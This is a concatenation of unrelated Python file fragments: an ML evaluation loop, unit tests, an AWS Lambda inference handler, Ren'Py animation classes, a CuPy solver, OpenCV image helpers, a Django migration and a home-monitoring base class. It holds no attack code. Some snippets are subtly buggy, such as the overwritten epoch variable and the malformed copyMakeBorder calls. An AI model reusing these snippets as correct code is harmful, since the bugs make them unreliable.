#loss_label = criterion_cla(pred_seed, label_cla)
#loss_box = criterion_box(pred_offset, label_reg)
#loss_box = (loss_box.mean(2) * label_cla).sum() / (label_cla.sum() + 1e-06)
loss = cls_loss + 5 * reg_loss + 0.1 * box_loss
torch.cuda.synchronize()
test_cla_loss = test_cla_loss + cls_loss.data*len(sample_box)
test_reg_loss = test_reg_loss + reg_loss.data*len(sample_box)
test_cla_pos_loss = test_cla_pos_loss + pcls_loss.data*len(sample_box)
test_cla_neg_loss = test_cla_neg_loss + ncls_loss.data*len(sample_box)
test_box_loss = test_box_loss + box_loss.data*len(sample_box)
# estimation_cla_cpu = seed_pediction.sigmoid().detach().cpu().numpy()
# label_cla_cpu = label_cla.detach().cpu().numpy()
# correct = float(np.sum((estimation_cla_cpu[0:len(label_point_set),:] > 0.4) == label_cla_cpu[0:len(label_point_set),:])) / 169.0
# true_correct = float(np.sum((np.float32(estimation_cla_cpu[0:len(label_point_set),:] > 0.4) + label_cla_cpu[0:len(label_point_set),:]) == 2)/(np.sum(label_cla_cpu[0:len(label_point_set),:])))
# test_correct += correct
# test_true_correct += true_correct*len(label_point_set)
# time taken
torch.cuda.synchronize()
timer = time.time() - timer
timer = timer / len(test_data)
print('==> time to learn 1 sample = %f (ms)' %(timer*1000))
# print mse
test_cla_loss = test_cla_loss / len(test_data)
test_reg_loss = test_reg_loss / len(test_data)
test_cla_pos_loss = test_cla_pos_loss / len(test_data)
test_cla_neg_loss = test_cla_neg_loss / len(test_data)
test_label_loss = test_label_loss / len(test_data)
test_box_loss = test_box_loss / len(test_data)
print('cla_loss: %f, reg_loss: %f, box_loss: %f, #test_data = %d' %(test_cla_loss, test_reg_loss, test_box_loss, len(test_data)))
# test_correct = test_correct / len(test_data)
# print('mean-correct of 1 sample: %f, #test_data = %d' %(test_correct, len(test_data)))
# test_true_correct = test_true_correct / len(test_data)
# print('true correct of 1 sample: %f' %(test_true_correct))
# log
logging.info('Epoch#%d: train error=%e, test error=%e, %e, %e, lr = %f' %(epoch, train_mse, test_cla_loss, test_reg_loss, test_box_loss, scheduler.get_lr()[0]))
|
"""
Unittest for familytree.person module.
"""
from familytree.person import Person
class TestPerson:
def test_init_minimal(self):
p = Person(1, "Name")
assert p.id_ == 1
assert p.name == "Name"
assert p.gender == None
assert p.father_id == None
assert p.mother_id == None
assert p.birth_order == None
assert p.spouse_id == None
def test_init_full(self):
p = Person(1, "Name", "F",
father_id=2, mother_id=3, birth_order=1,
spouse_id=4)
assert p.id_ == 1
assert p.name == "Name"
assert p.gender == "F"
assert p.father_id == 2
assert p.mother_id == 3
assert p.birth_order == 1
assert p.spouse_id == 4
|
try:
import unzip_requirements
except ImportError:
pass
import json
import os
import tarfile
import boto3
import tensorflow as tf
import numpy as np
import census_data
import logging
logger = logging.getLogger()
logger.setLevel(logging.WARNING)
FILE_DIR = '/tmp/'
BUCKET = os.environ['BUCKET']
def _easy_input_function(data_dict, batch_size=64):
"""
data_dict = {
'<csv_col_1>': ['<first_pred_value>', '<second_pred_value>']
'<csv_col_2>': ['<first_pred_value>', '<second_pred_value>']
...
}
"""
# Convert input data to numpy arrays
for col in data_dict:
col_ind = census_data._CSV_COLUMNS.index(col)
dtype = type(census_data._CSV_COLUMN_DEFAULTS[col_ind][0])
data_dict[col] = np.array(data_dict[col],
dtype=dtype)
try:
labels = data_dict.pop('income_bracket')
except:
pass
ds = tf.data.Dataset.from_tensor_slices((data_dict, labels))
ds = ds.batch(64)
return ds
def _predict_point(predict_input_point, epoch_files):
"""
Makes predictions for a signle data point
"""
# Download model from S3 and extract
boto3.Session(
).resource('s3'
).Bucket(BUCKET
).download_file(
os.path.join(epoch_files,'model.tar.gz'),
FILE_DIR+'model.tar.gz')
tarfile.open(FILE_DIR+'model.tar.gz', 'r').extractall(FILE_DIR)
# Create feature columns
wide_cols, deep_cols = census_data.build_model_columns()
# Load model
classifier = tf.estimator.LinearClassifier(
feature_columns=wide_cols,
model_dir=FILE_DIR+'tmp/model_'+epoch_files+'/',
warm_start_from=FILE_DIR+'tmp/model_'+epoch_files+'/')
# Setup prediction
predict_iter = classifier.predict(
lambda:_easy_input_function(predict_input_point))
# Iterate over prediction and convert to lists
predictions = []
for prediction in predict_iter:
for key in prediction:
prediction[key] = prediction[key].tolist()
predictions.append(prediction)
logging.warning('predictions is %s', predictions)
return predictions
def inferHandler(event, context):
run_from_queue = False
try:
# This path is executed when the lamda is invoked directly
body = json.loads(event.get('body'))
except:
# This path is executed when the lamda is invoked through the lambda queue
run_from_queue = True
body = event
# Read in prediction data as dictionary
# Keys should match _CSV_COLUMNS, values should be lists
predict_input = body['input']
logging.warning('predict_input type is %s', type(predict_input))
logging.warning('predict_input is %s', predict_input)
# Read in epoch
epoch_files = body['epoch']
epoch_files = ''
logging.warning('run_from_queue is %s', run_from_queue)
predictions_batch = []
if isinstance(predict_input, list) and not run_from_queue:
# Direct call with many datapoints
for jj in range(len(predict_input)):
predict_input_point = predict_input[jj][0]
predictions = _predict_point(predict_input_point, epoch_files)
predictions_batch.append(predictions)
elif run_from_queue:
# Call from lambda queue
predict_input_point = predict_input[0]
if isinstance(predict_input_point, list):
predict_input_point = predict_input_point[0]
logging.warning('predict_input_point is %s', predict_input_point)
predictions = _predict_point(predict_input_point, epoch_files)
logging.warning('predictions is %s', predictions)
predictions_batch.append(predictions)
else:
# Direct call with one datapoint
predict_input_point = predict_input
predictions = _predict_point(predict_input_point, epoch_files)
predictions_batch.append(predictions)
if not run_from_queue:
logging.warning('Return from normal execution')
response = {
"statusCode": 200,
"body": json.dumps(predictions_batch,
default=lambda x: x.decode('utf-8'))
}
else:
logging.warning('Return from queue execution')
response = {
"statusCode": 200,
"body": json.dumps(predictions_batch,
default=lambda x: x.decode('utf-8'))
}
logging.warning('response is %s', response)
return response
|
# Copyright 2004-2019 Tom Rothamel <pytom@bishoujo.us>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# This file contains displayables that move, zoom, rotate, or otherwise
# transform displayables. (As well as displayables that support them.)
from __future__ import print_function
from renpy.display.transform import * # @UnusedWildImport
import math
import renpy.display
from renpy.display.render import render
from renpy.display.layout import Container
class Motion(Container):
"""
This is used to move a child displayable around the screen. It
works by supplying a time value to a user-supplied function,
which is in turn expected to return a pair giving the x and y
location of the upper-left-hand corner of the child, or a
4-tuple giving that and the xanchor and yanchor of the child.
The time value is a floating point number that ranges from 0 to
1. If repeat is True, then the motion repeats every period
sections. (Otherwise, it stops.) If bounce is true, the
time value varies from 0 to 1 to 0 again.
The function supplied needs to be pickleable, which means it needs
to be defined as a name in an init block. It cannot be a lambda or
anonymous inner function. If you can get away with using Pan or
Move, use them instead.
Please note that floats and ints are interpreted as for xpos and
ypos, with floats being considered fractions of the screen.
"""
def __init__(self, function, period, child=None, new_widget=None, old_widget=None, repeat=False, bounce=False, delay=None, anim_timebase=False, tag_start=None, time_warp=None, add_sizes=False, style='motion', **properties):
"""
@param child: The child displayable.
@param new_widget: If child is None, it is set to new_widget,
so that we can speak the transition protocol.
@param old_widget: Ignored, for compatibility with the transition protocol.
@param function: A function that takes a floating point value and returns
an xpos, ypos tuple.
@param period: The amount of time it takes to go through one cycle, in seconds.
@param repeat: Should we repeat after a period is up?
@param bounce: Should we bounce?
@param delay: How long this motion should take. If repeat is None, defaults to period.
@param anim_timebase: If True, use the animation timebase rather than the shown timebase.
@param time_warp: If not None, this is a function that takes a
fraction of the period (between 0.0 and 1.0), and returns a
new fraction of the period. Use this to warp time, applying
acceleration and deceleration to motions.
This can also be used as a transition. When used as a
transition, the motion is applied to the new_widget for delay
seconds.
"""
if child is None:
child = new_widget
if delay is None and not repeat:
delay = period
super(Motion, self).__init__(style=style, **properties)
if child is not None:
self.add(child)
self.function = function
self.period = period
self.repeat = repeat
self.bounce = bounce
self.delay = delay
self.anim_timebase = anim_timebase
self.time_warp = time_warp
self.add_sizes = add_sizes
self.position = None
def update_position(self, t, sizes):
if renpy.game.less_updates:
if self.delay:
t = self.delay
if self.repeat:
t = t % self.period
else:
t = self.period
elif self.delay and t >= self.delay:
t = self.delay
if self.repeat:
t = t % self.period
elif self.repeat:
t = t % self.period
renpy.display.render.redraw(self, 0)
else:
if t > self.period:
t = self.period
else:
renpy.display.render.redraw(self, 0)
if self.period > 0:
t /= self.period
else:
t = 1
if self.time_warp:
t = self.time_warp(t)
if self.bounce:
t = t * 2
if t > 1.0:
t = 2.0 - t
if self.add_sizes:
res = self.function(t, sizes)
else:
res = self.function(t)
res = tuple(res)
if len(res) == 2:
self.position = res + (self.style.xanchor or 0, self.style.yanchor or 0)
else:
self.position = res
def get_placement(self):
if self.position is None:
if self.add_sizes:
# Almost certainly gives the wrong placement, but there's nothing
# we can do.
return super(Motion, self).get_placement()
else:
self.update_position(0.0, None)
return self.position + (self.style.xoffset, self.style.yoffset, self.style.subpixel)
def render(self, width, height, st, at):
if self.anim_timebase:
t = at
else:
t = st
child = render(self.child, width, height, st, at)
cw, ch = child.get_size()
self.update_position(t, (width, height, cw, ch))
rv = renpy.display.render.Render(cw, ch)
rv.blit(child, (0, 0))
self.offsets = [ (0, 0) ]
return rv
class Interpolate(object):
anchors = {
'top' : 0.0,
'center' : 0.5,
'bottom' : 1.0,
'left' : 0.0,
'right' : 1.0,
}
def __init__(self, start, end):
if len(start) != len(end):
raise Exception("The start and end must have the same number of arguments.")
self.start = [ self.anchors.get(i, i) for i in start ]
self.end = [ self.anchors.get(i, i) for i in end ]
def __call__(self, t, sizes=(None, None, None, None)):
types = (renpy.atl.position,) * len(self.start)
return renpy.atl.interpolate(t, tuple(self.start), tuple(self.end), types)
def Pan(startpos, endpos, time, child=None, repeat=False, bounce=False,
anim_timebase=False, style='motion', time_warp=None, **properties):
"""
This is used to pan over a child displayable, which is almost
always an image. It works by interpolating the placement of the
upper-left corner of the screen, over time. It's only really
suitable for use with images that are larger than the screen,
and we don't do any cropping on the image.
@param startpos: The initial coordinates of the upper-left
corner of the screen, relative to the image.
@param endpos: The coordinates of the upper-left corner of the
screen, relative to the image, after time has elapsed.
@param time: The time it takes to pan from startpos to endpos.
@param child: The child displayable.
@param repeat: True if we should repeat this forever.
@param bounce: True if we should bounce from the start to the end
to the start.
@param anim_timebase: True if we use the animation timebase, False to use the
displayable timebase.
@param time_warp: If not None, this is a function that takes a
fraction of the period (between 0.0 and 1.0), and returns a
new fraction of the period. Use this to warp time, applying
acceleration and deceleration to motions.
This can be used as a transition. See Motion for details.
"""
x0, y0 = startpos
x1, y1 = endpos
return Motion(Interpolate((-x0, -y0), (-x1, -y1)),
time,
child,
repeat=repeat,
bounce=bounce,
style=style,
anim_timebase=anim_timebase,
time_warp=time_warp,
**properties)
def Move(startpos, endpos, time, child=None, repeat=False, bounce=False,
anim_timebase=False, style='motion', time_warp=None, **properties):
"""
This is used to pan over a child displayable relative to
the containing area. It works by interpolating the placement of the
the child, over time.
@param startpos: The initial coordinates of the child
relative to the containing area.
@param endpos: The coordinates of the child at the end of the
move.
@param time: The time it takes to move from startpos to endpos.
@param child: The child displayable.
@param repeat: True if we should repeat this forever.
@param bounce: True if we should bounce from the start to the end
to the start.
@param anim_timebase: True if we use the animation timebase, False to use the
displayable timebase.
@param time_warp: If not None, this is a function that takes a
fraction of the period (between 0.0 and 1.0), and returns a
new fraction of the period. Use this to warp time, applying
acceleration and deceleration to motions.
This can be used as a transition. See Motion for details.
"""
return Motion(Interpolate(startpos, endpos),
time,
child,
repeat=repeat,
bounce=bounce,
anim_timebase=anim_timebase,
style=style,
time_warp=time_warp,
**properties)
class Revolver(object):
def __init__(self, start, end, child, around=(0.5, 0.5), cor=(0.5, 0.5), pos=None):
self.start = start
self.end = end
self.around = around
self.cor = cor
self.pos = pos
self.child = child
def __call__(self, t, rect):
(w, h, cw, ch) = rect
# Converts a float to an integer in the given range, passes
# integers through unchanged.
def fti(x, r):
if x is None:
x = 0
if isinstance(x, float):
return int(x * r)
else:
return x
if self.pos is None:
pos = self.child.get_placement()
else:
pos = self.pos
xpos, ypos, xanchor, yanchor, _xoffset, _yoffset, _subpixel = pos
xpos = fti(xpos, w)
ypos = fti(ypos, h)
xanchor = fti(xanchor, cw)
yanchor = fti(yanchor, ch)
xaround, yaround = self.around
xaround = fti(xaround, w)
yaround = fti(yaround, h)
xcor, ycor = self.cor
xcor = fti(xcor, cw)
ycor = fti(ycor, ch)
angle = self.start + (self.end - self.start) * t
angle *= math.pi / 180
# The center of rotation, relative to the xaround.
x = xpos - xanchor + xcor - xaround
y = ypos - yanchor + ycor - yaround
# Rotate it.
nx = x * math.cos(angle) - y * math.sin(angle)
ny = x * math.sin(angle) + y * math.cos(angle)
# Project it back.
nx = nx - xcor + xaround
ny = ny - ycor + yaround
return (renpy.display.core.absolute(nx), renpy.display.core.absolute(ny), 0, 0)
def Revolve(start, end, time, child, around=(0.5, 0.5), cor=(0.5, 0.5), pos=None, **properties):
return Motion(Revolver(start, end, child, around=around, cor=cor, pos=pos),
time,
child,
add_sizes=True,
**properties)
def zoom_render(crend, x, y, w, h, zw, zh, bilinear):
"""
This creates a render that zooms its child.
`crend` - The render of the child.
`x`, `y`, `w`, `h` - A rectangle inside the child.
`zw`, `zh` - The size the rectangle is rendered to.
`bilinear` - Should we be rendering in bilinear mode?
"""
rv = renpy.display.render.Render(zw, zh)
if zw == 0 or zh == 0 or w == 0 or h == 0:
return rv
rv.forward = renpy.display.render.Matrix2D(w / zw, 0, 0, h / zh)
rv.reverse = renpy.display.render.Matrix2D(zw / w, 0, 0, zh / h)
rv.xclipping = True
rv.yclipping = True
rv.blit(crend, rv.reverse.transform(-x, -y))
return rv
class ZoomCommon(renpy.display.core.Displayable):
def __init__(self,
time, child,
end_identity=False,
after_child=None,
time_warp=None,
bilinear=True,
opaque=True,
anim_timebase=False,
repeat=False,
style='motion',
**properties):
"""
@param time: The amount of time it will take to
interpolate from the start to the end rectange.
@param child: The child displayable.
@param after_child: If present, a second child
widget. This displayable will be rendered after the zoom
completes. Use this to snap to a sharp displayable after
the zoom is done.
@param time_warp: If not None, this is a function that takes a
fraction of the period (between 0.0 and 1.0), and returns a
new fraction of the period. Use this to warp time, applying
acceleration and deceleration to motions.
"""
super(ZoomCommon, self).__init__(style=style, **properties)
child = renpy.easy.displayable(child)
self.time = time
self.child = child
self.repeat = repeat
if after_child:
self.after_child = renpy.easy.displayable(after_child)
else:
if end_identity:
self.after_child = child
else:
self.after_child = None
self.time_warp = time_warp
self.bilinear = bilinear
self.opaque = opaque
self.anim_timebase = anim_timebase
def visit(self):
return [ self.child, self.after_child ]
def render(self, width, height, st, at):
if self.anim_timebase:
t = at
else:
t = st
if self.time:
done = min(t / self.time, 1.0)
else:
done = 1.0
if self.repeat:
done = done % 1.0
if renpy.game.less_updates:
done = 1.0
self.done = done
if self.after_child and done == 1.0:
return renpy.display.render.render(self.after_child, width, height, st, at)
if self.time_warp:
done = self.time_warp(done)
rend = renpy.display.render.render(self.child, width, height, st, at)
rx, ry, rw, rh, zw, zh = self.zoom_rectangle(done, rend.width, rend.height)
if rx < 0 or ry < 0 or rx + rw > rend.width or ry + rh > rend.height:
raise Exception("Zoom rectangle %r falls outside of %dx%d parent surface." % ((rx, ry, rw, rh), rend.width, rend.height))
rv = zoom_render(rend, rx, ry, rw, rh, zw, zh, self.bilinear)
if self.done < 1.0:
renpy.display.render.redraw(self, 0)
return rv
def event(self, ev, x, y, st):
if not self.time:
done = 1.0
else:
done = min(st / self.time, 1.0)
if done == 1.0 and self.after_child:
return self.after_child.event(ev, x, y, st)
else:
return None
class Zoom(ZoomCommon):
def __init__(self, size, start, end, time, child, **properties):
end_identity = (end == (0.0, 0.0) + size)
super(Zoom, self).__init__(time, child, end_identity=end_identity, **properties)
self.size = size
self.start = start
self.end = end
def zoom_rectangle(self, done, width, height):
rx, ry, rw, rh = [ (a + (b - a) * done) for a, b in zip(self.start, self.end) ]
return rx, ry, rw, rh, self.size[0], self.size[1]
class FactorZoom(ZoomCommon):
def __init__(self, start, end, time, child, **properties):
end_identity = (end == 1.0)
super(FactorZoom, self).__init__(time, child, end_identity=end_identity, **properties)
self.start = start
self.end = end
def zoom_rectangle(self, done, width, height):
factor = self.start + (self.end - self.start) * done
return 0, 0, width, height, factor * width, factor * height
class SizeZoom(ZoomCommon):
def __init__(self, start, end, time, child, **properties):
end_identity = False
super(SizeZoom, self).__init__(time, child, end_identity=end_identity, **properties)
self.start = start
self.end = end
def zoom_rectangle(self, done, width, height):
sw, sh = self.start
ew, eh = self.end
zw = sw + (ew - sw) * done
zh = sh + (eh - sh) * done
return 0, 0, width, height, zw, zh
class RotoZoom(renpy.display.core.Displayable):
transform = None
def __init__(self,
rot_start,
rot_end,
rot_delay,
zoom_start,
zoom_end,
zoom_delay,
child,
rot_repeat=False,
zoom_repeat=False,
rot_bounce=False,
zoom_bounce=False,
rot_anim_timebase=False,
zoom_anim_timebase=False,
rot_time_warp=None,
zoom_time_warp=None,
opaque=False,
style='motion',
**properties):
super(RotoZoom, self).__init__(style=style, **properties)
self.rot_start = rot_start
self.rot_end = rot_end
self.rot_delay = rot_delay
self.zoom_start = zoom_start
self.zoom_end = zoom_end
self.zoom_delay = zoom_delay
self.child = renpy.easy.displayable(child)
self.rot_repeat = rot_repeat
self.zoom_repeat = zoom_repeat
self.rot_bounce = rot_bounce
self.zoom_bounce = zoom_bounce
self.rot_anim_timebase = rot_anim_timebase
self.zoom_anim_timebase = zoom_anim_timebase
self.rot_time_warp = rot_time_warp
self.zoom_time_warp = zoom_time_warp
self.opaque = opaque
def visit(self):
return [ self.child ]
def render(self, width, height, st, at):
if self.rot_anim_timebase:
rot_time = at
else:
rot_time = st
if self.zoom_anim_timebase:
zoom_time = at
else:
zoom_time = st
if self.rot_delay == 0:
rot_time = 1.0
else:
rot_time /= self.rot_delay
if self.zoom_delay == 0:
zoom_time = 1.0
else:
zoom_time /= self.zoom_delay
if self.rot_repeat:
rot_time %= 1.0
if self.zoom_repeat:
zoom_time %= 1.0
if self.rot_bounce:
rot_time *= 2
rot_time = min(rot_time, 2.0 - rot_time)
if self.zoom_bounce:
zoom_time *= 2
zoom_time = min(zoom_time, 2.0 - zoom_time)
if renpy.game.less_updates:
rot_time = 1.0
zoom_time = 1.0
rot_time = min(rot_time, 1.0)
zoom_time = min(zoom_time, 1.0)
if self.rot_time_warp:
rot_time = self.rot_time_warp(rot_time)
if self.zoom_time_warp:
zoom_time = self.zoom_time_warp(zoom_time)
angle = self.rot_start + (1.0 * self.rot_end - self.rot_start) * rot_time
zoom = self.zoom_start + (1.0 * self.zoom_end - self.zoom_start) * zoom_time
# angle = -angle * math.pi / 180
zoom = max(zoom, 0.001)
if self.transform is None:
self.transform = Transform(self.child)
self.transform.rotate = angle
self.transform.zoom = zoom
rv = renpy.display.render.render(self.transform, width, height, st, at)
if rot_time <= 1.0 or zoom_time <= 1.0:
renpy.display.render.redraw(self.transform, 0)
return rv
# For compatibility with old games.
renpy.display.layout.Transform = Transform
renpy.display.layout.RotoZoom = RotoZoom
renpy.display.layout.SizeZoom = SizeZoom
renpy.display.layout.FactorZoom = FactorZoom
renpy.display.layout.Zoom = Zoom
renpy.display.layout.Revolver = Revolver
renpy.display.layout.Motion = Motion
renpy.display.layout.Interpolate = Interpolate
# Leave these functions around - they might have been pickled somewhere.
renpy.display.layout.Revolve = Revolve # function
renpy.display.layout.Move = Move # function
renpy.display.layout.Pan = Pan # function
|
import numpy
import cupy
from cupy.cuda import cublas
from cupy.cuda import device
from cupy.linalg import util
def solve_triangular(a, b, trans=0, lower=False, unit_diagonal=False,
overwrite_b=False, check_finite=False):
"""Solve the equation a x = b for x, assuming a is a triangular matrix.
Args:
a (cupy.ndarray): The matrix with dimension ``(M, M)``.
b (cupy.ndarray): The matrix with dimension ``(M,)`` or
``(M, N)``.
lower (bool): Use only data contained in the lower triangle of ``a``.
Default is to use upper triangle.
trans (0, 1, 2, 'N', 'T' or 'C'): Type of system to solve:
- *'0'* or *'N'* -- :math:`a x = b`
- *'1'* or *'T'* -- :math:`a^T x = b`
- *'2'* or *'C'* -- :math:`a^H x = b`
unit_diagonal (bool): If ``True``, diagonal elements of ``a`` are
assumed to be 1 and will not be referenced.
overwrite_b (bool): Allow overwriting data in b (may enhance
performance)
check_finite (bool): Whether to check that the input matrices contain
only finite numbers. Disabling may give a performance gain, but may
result in problems (crashes, non-termination) if the inputs do
contain infinities or NaNs.
Returns:
cupy.ndarray:
The matrix with dimension ``(M,)`` or ``(M, N)``.
.. seealso:: :func:`scipy.linalg.solve_triangular`
"""
util._assert_cupy_array(a, b)
if len(a.shape) != 2 or a.shape[0] != a.shape[1]:
raise ValueError('expected square matrix')
if len(a) != len(b):
raise ValueError('incompatible dimensions')
# Cast to float32 or float64
if a.dtype.char in 'fd':
dtype = a.dtype
else:
dtype = numpy.promote_types(a.dtype.char, 'f')
a = cupy.array(a, dtype=dtype, order='F', copy=False)
b = cupy.array(b, dtype=dtype, order='F', copy=(not overwrite_b))
if check_finite:
if a.dtype.kind == 'f' and not cupy.isfinite(a).all():
raise ValueError(
'array must not contain infs or NaNs')
if b.dtype.kind == 'f' and not cupy.isfinite(b).all():
raise ValueError(
'array must not contain infs or NaNs')
m, n = (b.size, 1) if b.ndim == 1 else b.shape
cublas_handle = device.get_cublas_handle()
if dtype == 'f':
trsm = cublas.strsm
else: # dtype == 'd'
trsm = cublas.dtrsm
if lower:
uplo = cublas.CUBLAS_FILL_MODE_LOWER
else:
uplo = cublas.CUBLAS_FILL_MODE_UPPER
if trans == 'N':
trans = cublas.CUBLAS_OP_N
elif trans == 'T':
trans = cublas.CUBLAS_OP_T
elif trans == 'C':
trans = cublas.CUBLAS_OP_C
if unit_diagonal:
diag = cublas.CUBLAS_DIAG_UNIT
else:
diag = cublas.CUBLAS_DIAG_NON_UNIT
trsm(
cublas_handle, cublas.CUBLAS_SIDE_LEFT, uplo,
trans, diag,
m, n, 1, a.data.ptr, m, b.data.ptr, m)
return b
|
from vininfo import Vin
def test_opel():
vin = Vin('W0LPC6DB3CC123456')
assert '%s' % vin
assert vin.wmi == 'W0L'
assert vin.manufacturer == 'Opel/Vauxhall'
assert vin.vds == 'PC6DB3'
assert vin.vis == 'CC123456'
assert vin.years == [2012, 1982]
assert vin.region_code == 'W'
assert vin.region == 'Europe'
assert vin.country_code == 'W0'
assert vin.country == 'Germany/West Germany'
assert '%s' % vin.brand == 'Opel (Opel/Vauxhall)'
details = vin.details
assert details.model.code == 'P'
assert details.model.name == ['Astra J', 'Zafira C']
assert details.body.code == '6'
assert details.body.name == 'Hatchback, 5-Door'
assert details.engine.code == 'B'
assert details.engine.name == 'A14XER100HP'
assert details.plant.code == 'C'
assert details.plant.name == 'Yelabuga'
assert details.serial.code == '123456'
|
import numpy
import cv2
def contour_coordinates(contour):
'''
Returns coordinates of a contour
'''
if cv2.contourArea(contour) > 10:
M = cv2.moments(contour)
return (int(M['m10']/M['m00']))
def drawSquare(image):
'''
Draws a square around the found digits
'''
b = [0,0,0]
height, width = image.shape[0], image.shape[1]
if(height == width): ## if square
square = image
return square
else:
d_size = cv2.resize(image, (2*width, 2*height), interpolation=cv2.INTER_CUBIC)
height, width = height * 2, width * 2
if (height > width):
padding = (height - width)/2
d_size_square = cv2.copyMakeBorder(d_size, 0, padding, padding, cv2.BORDER_CONSTANT, value=b)
else:
padding = (width - height)/2
d_size_square = cv2.copyMakeBorder(d_size, padding, padding, 0, 0, cv2.BORDER_CONSTANT, value=b)
return d_size_square
def resize(image, dim):
'''
Returns orignal image resized to shape 'dim'
'''
b = [0,0,0]
dim = dim - 4
squared = image
r = (float(dim) / squared.shape[1])
d = (dim, int(squared.shape[0] * r))
resized = cv2.resize(image, d, interpolation = cv2.INTER_AREA)
height, width = resized.shape[0], resized[1]
if (height > width):
resized = cv2.copyMakeBorder(resized, 0,0,0,1, cv2.BORDER_CONSTANT, value=b)
if (height < width):
resized = cv2.copyMakeBorder(resized, 1,0,0,0, cv2.BORDER_CONSTANT, value=b)
resized = cv2.copyMakeBorder(resized, 2,2,2,2,cv2.BORDER_CONSTANT, value=b)
height, width = resized.shape[0], resized.shape[1]
return resized
|
# Generated by Django 2.2 on 2020-04-21 14:03
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('coreapp', '0056_auto_20200420_1340'),
]
operations = [
migrations.AddField(
model_name='projectpricing',
name='custom_supprt',
field=models.FloatField(default=0.0),
),
]
|
'''
Created on Jul 30, 2012
@author: Gary
'''
import abc
from pubsub import pub
from housemonitor.lib.base import Base
from datetime import datetime
from housemonitor.lib.common import Common
from housemonitor.lib.getdatetime import GetDateTime
from housemonitor.lib.constants import Constants
import copy
class abcStep( Base ):
'''
This is a abstract class which is used by the step routines to convert one type of data to another.
For example: To convert Centigrade to Fahrenheit:
#. Create a class that has a base class of abcStep.
#. Add a function called *step* that does the conversion.
#. Add the other abstract methods and properties that are required:
#. **topic_name** The topic name to which this routine subscribes.
#. **logger_name** Set the logger name.
For an example see the other files in the step directory.
'''
__metaclass__ = abc.ABCMeta
whoami = None
def __init__( self ):
'''
Constructor
'''
super( abcStep, self ).__init__()
pub.subscribe( self.substep, self.topic_name )
pub.subscribe( self.getUseCount, self.statistics_topic_name )
pub.subscribe( self.getErrorCount, self.statistics_topic_name )
self.whoami = self.__class__.__name__
def getUseCount( self, value, data, listeners ):
'''
Report the number of times that step has been called.
:param value: Not used.
:type value: int
:param data: a dictionary containing more information about the value.
:param listeners: a list of the subscribed routines to send the to.
:returns: int, dict, listeners
>>> from steps.zigbee2volts import ZigbeeCountToVolts
>>> zig = ZigbeeCountToVolts()
>>> zig.getUseCount(100, {'device': 'xyz', 'port': 'abc'}, ['a', 'b'])
(0, {'device': 'xyz', 'units': 'V', 'port': 'abc'}, ['a', 'b'])
>>> zig.step(1, {'device': 'xyz', 'port': 'abc'}, ['a', 'b'])
>>> zig.getUseCount(100, {'device': 'xyz', 'port': 'abc'}, ['a', 'b'])
(1, {'device': 'xyz', 'units': 'V', 'port': 'abc'}, ['a', 'b'])
'''
if ( self.counter != 0 ):
self.logger.debug( 'getUseCount = {}'.format( self.counter ) )
data[Constants.DataPacket.device] = 'HouseMonitor.' + self.whoami
data[Constants.DataPacket.port] = data[Constants.DataPacket.name] = 'Count'
data[Constants.DataPacket.arrival_time] = self.last_count_time
try:
Common.send( self.counter, data, copy.copy( listeners ) )
except Exception as ex:
self.logger.exception( 'Common.send error {}'.format( ex ) )
def getErrorCount( self, value, data, listeners ):
''' Report the number of errors that has occurred in this step.
:param value: Not used.
:type value: int
:param data: a dictionary containing more information about the
value. Data can be added to this as needed. Here is a list
of values that will be in the data dictionary:
| 1. **date:** time received: time when value was received.
| 2. **units:** units of the number
| 3. **name:** name assigned to the value
:param listeners: a list of the subscribed routines to send the data to
:returns: count, data, listeners
:rtype: float, dict, listeners
:Raises: None
>>> from steps.zigbee2volts import ZigbeeCountToVolts
>>> zig = ZigbeeCountToVolts()
>>> zig.getErrorCount(100, {'device': 'xyz', 'port': 'abc'}, ['a', 'b'])
'''
if ( self.errors != 0 ):
self.logger.debug( 'getErrorCount = {}'.format( self.errors ) )
data[Constants.DataPacket.device] = 'HouseMonitor.' + self.whoami
data[Constants.DataPacket.port] = data[Constants.DataPacket.name] = 'Error Count'
data[Constants.DataPacket.arrival_time] = self.last_error_time
try:
Common.send( self.errors, data, copy.copy( listeners ) )
except Exception as ex:
self.logger.exception( 'Common.send error {}'.format( ex ) )
@abc.abstractproperty
def topic_name( self ): # pragma: no cover
""" The topic name that pubsub uses to send data to this step. """
return 'Should never see this'
counter = 0
''' Contains the number of times that step has been called '''
last_count_time = None
''' Contains time when step was last called. '''
errors = 0
''' Contains the number of errors. '''
last_error_time = None
''' Contains the time of the last error. '''
def logger_name( self ):
""" Set the logger name. This needs to be added to house_monitoring_logging.conf """
return 'steps' # pragma: no cover
@property
def statistics_topic_name( self ):
''' Set the name that pubsub uses to get usage information about the module. '''
return Constants.TopicNames.Statistics
@abc.abstractmethod
def step( self, value, data, listeners ):
'''
Abstract method for the procedure that does all user specific computations.
:param value: The input value to be processesed
:type value: int, float, string, etc
:param data: a dictionary containing more information about the value.
:param listeners: a list of the subscribed routines to send the data to
:returns: new_value, new_data, new_listeners
:rtype: int, dict, listeners
:raises: None
'''
pass # pragma: no cover
def substep( self, value, data, listeners ):
'''
This function is wraps step function. It counts usage, errors then sends the data to next function.
:param value: The number to convert to volts.
:type value: int, float, string, etc
:param data: a dictionary containing more information about the
value. Data can be added to this as needed. Here is a list
of values that will be in the data dictionary:
| 1 **date:** time received: time when value was received.
| 2. **units:** units of the number
| 3. **name:** name assigned to the value
| 4. **device** name of the device the data is from.
| 5. **port** name of the port the data is from.
:param listeners: a list of the pubsub routines to send the data to
:returns: value, data, listeners
